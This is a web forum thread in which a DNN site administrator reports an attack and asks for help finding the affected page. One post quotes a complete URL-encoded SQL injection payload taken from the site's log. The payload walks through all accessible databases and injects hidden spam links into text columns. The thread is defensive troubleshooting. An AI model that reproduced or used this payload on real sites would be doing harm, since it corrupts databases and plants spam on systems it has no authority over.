Products

Solutions

Resources

Partners

Community

Blog

About

QA

Ideas Test

New Community Website

Ordinarily, you'd be at the right spot, but we've recently launched a brand new community website... For the community, by the community.

Yay... Take Me to the Community!

Welcome to the DNN Community Forums, your preferred source of online community support for all things related to DNN.
In order to participate you must be a registered DNNizen

HomeHomeUsing DNN Platf...Using DNN Platf...Administration ...Administration ...DNN 6.2.9 under attackDNN 6.2.9 under attack
Previous
 
Next
New Post
11/6/2015 5:24 AM
 

By the way, looking at the Activity Log on DNN I see the guys are trying to do this:

No use blocking IPs.  They are probably using TOR or some other software to mask their IP because their attacks seem to be coming from Brasil, Ukraine, China, Canada and all kinds of places while they're probably coming from next door... :/

 /Default.aspx?tabid=649;declare%20@b%20cursor;declare%20@s%20varchar(8000);declare%20@w%20varchar(99);set%20@b=cursor%20for%20select%20DB_NAME(

)%20union%20select%20name%20from%20sys.databases%20where%20(has_dbaccess(name)!=0)%20and%20name%20not%20in%20('master','tempdb','model','msdb',DB_NAME())

;open%20@b;fetch%20next%20from%20@b%20into%20@w;while%20@@FETCH_STATUS=0%20begin%20set%20@s='begin%20try%20use%20'%2B@w%2B';declare%20@c%20cursor;

declare%20@d%20varchar(4000);set%20@c=cursor%20for%20select%20''update%20%5B''%2BTABLE_NAME%2B''%5D%20set%20%5B''%2BCOLUMN_NAME%2B''%5D=%5B''

%2BCOLUMN_NAME%2B''%5D%2Bcase%20ABS(CHECKSUM(NewId()))%2510%20when%200%20then%20''''''%2Bchar(60)%2B''div%20style=%22display:none%22''%2Bchar(62)%2B''

why%20wife%20cheat%20''%2Bchar(60)%2B''a%20href=%22http:''%2Bchar(47)%2Bchar(47)%2B''maryaltmansblog.com.nobullsoftware.com''%2Bchar(47)%2B''page''%2Bchar(47)%2B''

why-wifes-cheat.aspx%22''%2Bchar(62)%2B''''''%2Bcase%20ABS(CHECKSUM(NewId()))%253%20when%200%20then%20''''cheat%20women''''%20when%201%20then%20''''open''''%20else%20''''

married%20and%20want%20to%20cheat''''%20end%20%2B''''''%2Bchar(60)%2Bchar(47)%2B''a''%2Bchar(62)%2B''%20how%20to%20cheat%20on%20my%20husband''%2Bchar(60)%

2Bchar(47)%2B''div''%2Bchar(62)%2B''''''%20else%20''''''''%20end''%20FROM%20sysindexes%20AS%20i%20INNER%20JOIN%20sysobjects%20AS%20o%20ON%20i.id=o.id%20INNER%

20JOIN%20INFORMATION_SCHEMA.COLUMNS%20ON%20o.NAME=TABLE_NAME%20WHERE(indid%20in%20(0,1))%20and%20DATA_TYPE%20like%20''%25varchar''%

20and(CHARACTER_MAXIMUM_LENGTH%20in%20(2147483647,-1));open%20@c;fetch%20next%20from%20@c%20into%20@d;while%20@@FETCH_STATUS=0%20begin%

20exec%20(@d);fetch%20next%20from%20@c%20into%20@d;end;close%20@c%20end%20try%20begin%20catch%20end%20catch';exec%20(@s);fetch%20next%20from%

20@b%20into%20@w;end;close%20@b--

 

 
New Post
11/8/2015 6:35 AM
 
I wouldn't call this an attack specifically tailored for DNN - this seem to be a general attempt to add their spam into the database, which should fail on DNN. Did you find the text in any of your database tables?

Cheers from Germany,
Sebastian Leupold

dnnWerk - The DotNetNuke Experts   German Spoken DotNetNuke User Group

Speed up your DNN Websites with TurboDNN
 
New Post
11/9/2015 4:34 AM
 

Leupold, I don't really know since my first concern was to have my webistes up and running as soon as possible.

Didn't really have time to look into the tables I simply restored my DB.

One thing I can say for sure is that the spam content did not really manage to show in my content because it got mixed up with the render code of the modules (mainly my HTML modules) ultimately crippling them and the various websites instead of showing up. In the errors thrown I could see part of the spam content mixing with my HTML module code. They certainly managed to get my webistes down and cripple modules preventing them from showing my content.

The spam content did appear in the page code. It did not properly appear in the modules as code but I'm not sure google crawlers would notice the difference.

The fact that puzzles me is that they seem to manage to alter the database directly from the URL query string but I can't understand where. It says  

/Default.aspx?tabid=649

How can I understand which page/module they are attacking from this log entry? The entry was not associated to any specific portal, it was orange in colour and appeared as a Host Alert.


 
New Post
11/9/2015 9:05 AM
 
If the data got written to the database, there must be an issue in one of the modules on your site, not checking URL parameters properly, otherwise the call would have had no impact.
Which modules are installed on that page?

Cheers from Germany,
Sebastian Leupold

dnnWerk - The DotNetNuke Experts   German Spoken DotNetNuke User Group

Speed up your DNN Websites with TurboDNN
 
New Post
11/9/2015 9:45 AM
 
Sebastian Leupold wrote:
If the data got written to the database, there must be an issue in one of the modules on your site, not checking URL parameters properly, otherwise the call would have had no impact.
Which modules are installed on that page?

Hi Sebastian,

before I can answer I should be able to find outwhat page corresponds to tabid=649

Is there a way to find out or is it simply a trial and error process?

I have a number of portals running on the same installation. I tried to paste "Default.aspx?tabid=649" in a couple of them but it simply redirected me to the website homepage. Should I copy paste Default.aspx?tabid=649 on each and every one of them or there is a quicker way to find out which portal has tabid=649 as a valid page?

Thanks


 
Previous
 
Next
HomeHomeUsing DNN Platf...Using DNN Platf...Administration ...Administration ...DNN 6.2.9 under attackDNN 6.2.9 under attack


These Forums are dedicated to discussion of DNN Platform and Evoq Solutions.

For the benefit of the community and to protect the integrity of the ecosystem, please observe the following posting guidelines:

  1. No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DNN.
  2. No vendor trolling / poaching. If someone posts about a vendor issue, allow the vendor or other customers to respond. Any post that looks like trolling / poaching will be removed.
  3. Discussion or promotion of DNN Platform product releases under a different brand name are strictly prohibited.
  4. No Flaming or Trolling.
  5. No Profanity, Racism, or Prejudice.
  6. Site Moderators have the final word on approving / removing a thread or post or comment.
  7. English language posting only, please.
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out